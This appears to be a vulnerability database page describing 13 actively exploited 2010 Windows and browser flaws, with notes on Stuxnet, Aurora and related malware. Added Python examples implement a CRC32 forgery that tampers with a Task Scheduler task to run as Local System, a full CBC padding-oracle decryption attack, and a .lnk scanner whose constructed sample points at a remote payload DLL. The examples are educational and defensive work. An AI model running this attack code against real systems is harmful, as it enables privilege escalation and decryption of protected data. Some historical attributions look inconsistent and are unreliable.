Zero-day Vulnerability Database

Zero-day vulnerabilities discovered: 13

Remote code execution in Microsoft Internet Explorer
CVE-2010-3971

Memory corruption

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when parsing CSS. A remote attacker can create a specially crafted web page containing a style sheet that imports itself recursively, cause memory corruption and execute arbitrary code on the target system with the privileges of the current user.

Successful exploitation of this vulnerability may allow an attacker to compromise the vulnerable system.

Note: this vulnerability is being actively exploited.

The attacks appear to be connected to the group of Chinese hackers responsible for unleashing a pair of Java zero-day exploits in 2012. Judging by the geographical location of the targets of the CVE-2010-3971 attacks, these attempts bear a close resemblance to those targeting CVE-2010-3962, another Internet Explorer issue, which was dubbed the Weekend Warrior.

Software: Microsoft Internet Explorer

Known/famous malware:

Virus HTML:CVE-2010-3971-A

Privilege escalation in Windows Task Scheduler
CVE-2010-3338

Privilege escalation

The vulnerability allows a local user to obtain elevated privileges on the vulnerable system.

The vulnerability exists because Windows Task Scheduler does not properly validate task definition files before running scheduled tasks within the intended security context: a task's XML file stays writable by the user who created it, and the only integrity check is a CRC32 checksum of the file stored in the registry. A local user can create a task, edit its XML so that it runs as the local system account, append bytes that restore the original CRC32 and thereby execute arbitrary code on the vulnerable system with the privileges of the local system account.

Successful exploitation of this vulnerability may allow a local user to obtain full access to the vulnerable system.

Note: this vulnerability is being actively exploited.

The vulnerability was used by Stuxnet.

Software: Windows

Known/famous malware:

W32.Stuxnet
TDL-4 rootkit (TDSS)
Trojan.Generic.KDV.128306

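
Why a CRC32 checksum is not an integrity check, as an added example that is not part of the original entry or of Stuxnet's code: the block below takes a constructed task definition, changes the principal to the local system account, then computes four bytes that, placed inside an XML comment, bring the CRC32 of the tampered file back to the value computed for the original. The checksum arithmetic is standard CRC-32 (the zlib polynomial); the `forge_crc32`, `crc_state_before` and `demo` names and the sample XML are assumptions for illustration.

```python
POLY = 0xEDB88320  # reflected CRC-32 polynomial (zlib / IEEE 802.3)
MASK = 0xFFFFFFFF

TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ POLY if _c & 1 else _c >> 1
    TABLE.append(_c)

# For this polynomial the top byte of each table entry is unique, which is what
# lets us walk the CRC register backwards one byte at a time.
TOP = {entry >> 24: idx for idx, entry in enumerate(TABLE)}


def crc_state(data, state=MASK):
    # Standard table-driven CRC-32 update; returns the register before the final XOR.
    for b in data:
        state = TABLE[(state ^ b) & 0xFF] ^ (state >> 8)
    return state


def crc32(data):
    return crc_state(data) ^ MASK


def crc_state_before(state_after, suffix):
    # Invert the update for every byte of `suffix`: the register that, once
    # `suffix` is fed through it, ends at `state_after`.
    s = state_after
    for b in reversed(suffix):
        idx = TOP[s >> 24]
        s = (((s ^ TABLE[idx]) << 8) & MASK) | ((idx ^ b) & 0xFF)
    return s


def forge_crc32(prefix, suffix, target):
    # Return 4 bytes `patch` such that crc32(prefix + patch + suffix) == target.
    want = crc_state_before(target ^ MASK, suffix)  # register needed right after the patch
    idxs = []
    s = want
    for _ in range(4):                               # backwards: only the table indices matter
        idx = TOP[s >> 24]
        idxs.append(idx)
        s = ((s ^ TABLE[idx]) << 8) & MASK           # low byte unknown, and not needed
    s = crc_state(prefix)
    patch = bytearray()
    for idx in reversed(idxs):                       # forwards: pick the byte that hits each index
        patch.append((s ^ idx) & 0xFF)
        s = TABLE[idx] ^ (s >> 8)
    return bytes(patch)


def demo():
    # Constructed sample task definition (not a real Task Scheduler file).
    original = (b"<Task><Principals><Principal><UserId>alice</UserId>"
                b"<RunLevel>LeastPrivilege</RunLevel></Principal></Principals></Task>")
    tampered = (original.replace(b"<UserId>alice</UserId>", b"<UserId>S-1-5-18</UserId>")
                        .replace(b"LeastPrivilege", b"HighestAvailable"))
    target = crc32(original)  # the checksum the validator recorded when the task was created
    head, closing, _ = tampered.rpartition(b"</Task>")
    patch = forge_crc32(head + b"<!--", b"-->" + closing, target)
    forged = head + b"<!--" + patch + b"-->" + closing
    return original, forged, target
```

`demo()` returns the original file, the tampered file that now runs as Local System, and the checksum both share. The four patch bytes are arbitrary binary, so in a real file one would vary the surrounding filler until the patch is printable and keeps the XML well-formed; the collision itself is the point. A cryptographic hash, or better a keyed MAC, cannot be corrected this way, which is why a CRC must never guard a security decision.
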
Use-after-free when parsing CSS in Internet Explorer
CVE-2010-3962

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error when processing CSS token sequences and the clip attribute. A remote attacker can create a specially crafted HTML page, trick the victim into visiting it, cause memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Note: this vulnerability is being actively exploited.

Exploitation of this vulnerability was linked to cyberattacks tied to the Nobel Peace Prize ceremony and to a G20-themed malicious spam campaign, both reported in October 2010.

Software: Microsoft Internet Explorer

Known/famous malware:

Exploit: Win32/CVE-2010-3962.A.

Multiple privilege escalation vulnerabilities in Win32k.sys in Microsoft Windows
CVE-2010-2743

Improper validation of array index

The vulnerability allows a local user to execute arbitrary code with elevated privileges.

The vulnerability exists due to an error in the Win32k.sys driver when handling keyboard layouts: the Windows kernel fails to validate that an array index is within the bounds of the array. A local user can load a specially crafted keyboard layout and execute arbitrary code on the target system with the privileges of the SYSTEM account.

Successful exploitation of this vulnerability may allow an attacker to escalate privileges on the vulnerable system.

Note: this vulnerability is being actively exploited by Stuxnet.

The vulnerability was discovered by Sergey Golovanov of Kaspersky Lab and was exploited by Stuxnet.

Software: Windows

Known/famous malware:

W32.Stuxnet

Information disclosure in ASP.NET
CVE-2010-3332

Information disclosure

The vulnerability allows a remote attacker to obtain potentially sensitive information.

The vulnerability exists due to a padding oracle: when ASP.NET decrypts data it received from the client, it responds differently to ciphertexts whose padding is invalid than to other errors, so an attacker can learn one byte at a time whether a forged ciphertext decrypts to valid padding. A remote attacker can decrypt data encrypted by the server, such as the view state, use the same technique to craft ciphertexts that read files inside the web application's directory (such as web.config) and forge authentication cookies.

Successful exploitation of the vulnerability may allow an attacker to gain access to sensitive information and potentially compromise the vulnerable web application.

Note: this vulnerability is being publicly exploited.

Software: Microsoft .NET Framework
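
The attack behind this entry is a CBC padding oracle. The following block, an added example that is not part of the original database entry or of any Microsoft code, shows the whole mechanism end to end: a server that decrypts CBC ciphertexts and leaks whether the PKCS#7 padding was valid, and an attacker who uses nothing but that yes/no answer to recover the plaintext. Everything in it is an assumption for illustration: the `server_padding_oracle`, `padding_oracle_decrypt` and `demo` names, the SHA-256 Feistel toy block cipher standing in for AES so the block runs with the standard library only, and the constructed view-state-like secret.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, rnd, half):
    # Toy round function: SHA-256 as a keyed PRF, truncated to the half-block size.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    # 4-round Feistel network: a real permutation on 16-byte blocks. The attack
    # never depends on the cipher's strength, only on the padding leak.
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, plaintext):
    # Returns IV || C1 || ... || Cn, the usual layout of an encrypted token.
    iv = os.urandom(BLOCK)
    padded = pkcs7_pad(plaintext)
    out, prev = [iv], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, ciphertext):
    if len(ciphertext) < 2 * BLOCK or len(ciphertext) % BLOCK:
        raise ValueError("bad length")
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


def server_padding_oracle(key, ciphertext):
    # The leak: the server's answer reveals whether decryption produced valid padding.
    # Here a boolean; in the real attack it was a distinguishable error response.
    try:
        cbc_decrypt(key, ciphertext)
        return True
    except ValueError:
        return False


def recover_block(prev, target, oracle):
    # Learn D_k(target) one byte at a time, last byte first, by handing the oracle
    # a forged "previous block" and asking whether the result has valid padding.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            probe[j] = inter[j] ^ padval  # force the already-known bytes to padval
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe) + target):
                continue
            if pos == BLOCK - 1:
                # Rule out a lucky 0x02 0x02 (or longer) padding: disturb the byte to
                # the left; a genuine 0x01 padding stays valid, anything else breaks.
                probe[pos - 1] ^= 0xFF
                still_valid = oracle(bytes(probe) + target)
                probe[pos - 1] ^= 0xFF
                if not still_valid:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted byte %d" % pos)
    return _xor(inter, prev)


def padding_oracle_decrypt(ciphertext, oracle):
    # Attacker side: only the ciphertext and oracle access, never the key.
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(p, c, oracle) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


def demo():
    # Constructed sample: a view-state-like blob encrypted under a key the attacker never sees.
    key = os.urandom(16)
    secret = b"__VIEWSTATE (constructed sample): user=alice; role=user"
    token = cbc_encrypt(key, secret)
    recovered = padding_oracle_decrypt(token, lambda ct: server_padding_oracle(key, ct))
    return secret, recovered
```

`demo()` returns the constructed secret and the attacker's recovery of it; they match after at most 256 oracle queries per byte, plus one disambiguation query for the last byte of each block. The same per-byte loop, run in the other direction, lets the attacker encrypt chosen plaintext, which is how decryption of view state turns into forged tokens. The fix is to authenticate the ciphertext (a MAC checked before any decryption) and to return one uniform error for every failure, which removes the oracle.
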

Remote code execution in Print Spooler service in Microsoft Windows
CVE-2010-2729

Improper access control

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists because the Windows Print Spooler service does not correctly restrict access permissions when creating files on behalf of anonymous users. A remote attacker can send a specially crafted RPC request to the vulnerable service and write a malicious file to an arbitrary location on the system, such as the system directory.

This is a remote code execution vulnerability on Windows XP, since the guest account is enabled by default. On other operating systems this is a privilege escalation vulnerability, as only authenticated users have access to Print Spooler shares.

Successful exploitation of the vulnerability may result in remote code execution.

Note: this vulnerability is being actively exploited.

Two more CVEs refer to this vulnerability as well: CVE-2010-3888 and CVE-2010-3889. However, since the vendor has issued its advisory under a different CVE number, we use the one issued by Microsoft.

The vulnerability was exploited by the Stuxnet worm to spread to other hosts through shared printers, in what has been called the "print-bomb" attack.

Software: Windows

Remote code execution in Microsoft Windows
CVE-2010-2568

Improper input validation

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to an error in how the Windows Shell parses shortcut (.lnk) and .pif files when loading their icons. A remote attacker can create a specially crafted shortcut that references a Control Panel item; when Windows Explorer renders the shortcut's icon, for example because the victim opened a folder or removable drive containing it, the shell loads the attacker's DLL and executes arbitrary code on the target system with the privileges of the current user. No click on the shortcut is required.

Successful exploitation of the vulnerability results in compromise of the vulnerable system.

Note: this vulnerability is being actively exploited.

The vulnerability was used by the Stuxnet worm. According to Symantec, the first exploitation of the vulnerability was discovered on 2008-02-13.

Software: Windows

Known/famous malware:

Bloodhound.Exploit.343
W32.Stuxnet
W32.Changeup.C
W32.Ramnit

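
A triage check for this entry, written as an added example and not code from the original page or from any vendor: it parses the ShellLinkHeader and LinkTargetIDList of a .lnk file as laid out in the MS-SHLLINK specification and flags any target item that names a DLL, since a shortcut's target list should never name one. The `parse_link_target_idlist`, `suspicious_items`, `build_lnk` and `sample_lnk` names and the two constructed sample shortcuts are assumptions for illustration; the malicious sample stands in for a Control Panel item and simplifies its real layout, so this is a heuristic rather than a full CPL item parser.

```python
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x00000001                              # LinkFlags bit 0


def parse_link_target_idlist(lnk):
    """Return the body of every ItemID in the LinkTargetIDList ([] if the flag is clear)."""
    if len(lnk) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", lnk, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a shell link file")
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    (idlist_size,) = struct.unpack_from("<H", lnk, HEADER_SIZE)
    pos = HEADER_SIZE + 2
    end = pos + idlist_size
    if end > len(lnk):
        raise ValueError("IDListSize runs past the end of the file")
    items = []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", lnk, pos)
        if item_size == 0:                      # TerminalID
            break
        if item_size < 2 or pos + item_size > end:
            raise ValueError("malformed ItemID at offset %d" % pos)
        items.append(lnk[pos + 2:pos + item_size])  # ItemIDSize counts itself
        pos += item_size
    return items


def suspicious_items(lnk):
    """Heuristic: flag target items that name a DLL. Returns (index, decoded text) pairs."""
    hits = []
    for n, item in enumerate(parse_link_target_idlist(lnk)):
        text = item.decode("utf-16-le", errors="ignore")  # shell item strings are UTF-16LE
        if ".dll" in text.lower():
            hits.append((n, text.strip("\x00")))
    return hits


def build_lnk(items):
    # Constructed .lnk: a minimal ShellLinkHeader plus a LinkTargetIDList, nothing else.
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, HAS_LINK_TARGET_ID_LIST)
    header += b"\x00" * (HEADER_SIZE - len(header))
    body = b"".join(struct.pack("<H", len(i) + 2) + i for i in items) + b"\x00\x00"
    return header + struct.pack("<H", len(body)) + body


# Root folder shell item (type 0x1F) for the My Computer CLSID, as the first target item.
ROOT_MY_COMPUTER = b"\x1f\x50" + bytes.fromhex("e04fd020ea3a6910a2d808002b30309d")


def sample_lnk(malicious):
    # Both shortcuts are constructed samples.
    if malicious:
        # Stand-in for a Control Panel item pointing at an attacker DLL (layout simplified).
        payload = b"\x00" * 8 + "\\\\10.0.0.5\\share\\payload.dll".encode("utf-16-le") + b"\x00\x00"
        return build_lnk([ROOT_MY_COMPUTER, payload])
    return build_lnk([ROOT_MY_COMPUTER, b"\x31\x00" + b"notes.txt\x00"])
```

Run over a directory of .lnk files, `suspicious_items` surfaces shortcuts whose target list names a DLL, which is the shape the Stuxnet shortcuts had. A production rule would additionally check that the item sits under the Control Panel folder and that the path is not a known, signed control panel applet, and would treat a parse error as a finding rather than silently skipping the file.
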
Remote code execution when parsing URLs in Microsoft Windows
CVE-2010-1885

Improper input validation

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to an error when parsing URLs within the Microsoft Help and Support Center (the hcp:// protocol handler). A remote attacker can create a specially crafted hcp:// URL, trick the victim into clicking on it and execute arbitrary code on the target system with the privileges of the current user.

Successful exploitation of the vulnerability results in compromise of the vulnerable system.

Note: this vulnerability is being actively exploited.

The vulnerability was reported to Microsoft on June 5th, 2010 by Google security researcher Tavis Ormandy, who published the details publicly days later.
The vulnerability was used to compromise the Federal Financial Institutions Examination Council through its "inform@ffiec.gov" mailbox.

Software: Windows

Known/famous malware:

Mal/HcpExpl-A

Buffer overflow in MPEG layer-3 codecs in Microsoft Windows
CVE-2010-0480

Stack-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to multiple boundary errors within the Microsoft MPEG Layer-3 codecs when parsing AVI files. A remote unauthenticated attacker can create a specially crafted AVI file, trick the victim into opening it, trigger a stack-based buffer overflow and execute arbitrary code on the target system with the privileges of the current user.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Note: the vulnerability was being actively exploited.

According to Symantec, the first exploitation of the vulnerability was discovered on 2010-03-26.

Software: Windows

Known/famous malware:

Bloodhound.Exploit.324

Multiple vulnerabilities in Microsoft SharePoint
CVE-2010-0817

Cross-site scripting

The vulnerability allows a remote attacker to perform XSS attacks.

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the Help.aspx script. A remote attacker can trick the victim into following a specially crafted link and execute arbitrary HTML and script code in the victim's browser in the context of the vulnerable SharePoint site.

Successful exploitation may allow an attacker to conduct phishing and drive-by-download attacks.

Note: this vulnerability is being publicly exploited.

Software: Microsoft SharePoint Server

Known/famous malware:

Exploit: Win32/CVE-2010-0817

Remote code execution in Microsoft Internet Explorer
CVE-2010-0806

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error in the Peer Objects component within the iepeers.dll library. A remote attacker can create a specially crafted web page, trick the victim into visiting it and execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Note: this vulnerability is being actively exploited.

The exploit is functional and was in non-public use as a zero-day before the vulnerability was disclosed. The story of CVE-2010-0806 bears a certain similarity to the targeted 'Aurora' attack, where the exploit techniques were quickly adopted by the authors of web exploit kits for use in mass web attacks. The country most affected by attacks on this vulnerability in April 2010 was China, with 22% of the attacks, followed by Russia (17%), the USA (10%), India (4%) and Germany (4%).

Software: Microsoft Internet Explorer

Known/famous malware:

Some of the variants: Trojan:Win32/Wisp, TrojanDropper:Win32/Lisiu, TrojanDropper:Win32/Agent.gen!I, TrojanDownloader:Win32/Small.gen!AZ, Backdoor:Win32/Agent.FS, TrojanDropper:Win32/Frethog.

Integer overflow in Microsoft Paint
CVE-2010-0028

Integer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to an integer overflow when processing JPEG files in Microsoft Paint. A remote attacker can create a specially crafted JPEG file, trick the victim into opening it with Microsoft Paint, trigger the integer overflow and execute arbitrary code on the target system with the privileges of the current user.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

The first attack using an exploit for this vulnerability was detected by Symantec on 2008-10-14. The attackers targeted 102 hosts using 127 malware variants.

Software: Microsoft Paint

Known/famous malware:

Bloodhound.Exploit.314

Remote code execution in Microsoft Internet Explorer
CVE-2010-0249

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error in the HTML rendering engine (mshtml.dll) of Microsoft Internet Explorer. A remote attacker can create a specially crafted web page, trick the victim into visiting it and execute arbitrary code by accessing a pointer associated with a deleted object.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Note: this vulnerability is being actively exploited.

The exploit was used in the targeted 'Operation Aurora' attacks on Google and other U.S. companies, which Google claims originated in China. Source code was stolen from some of the more than 30 Silicon Valley companies targeted in the attack.

Software: Microsoft Internet Explorer
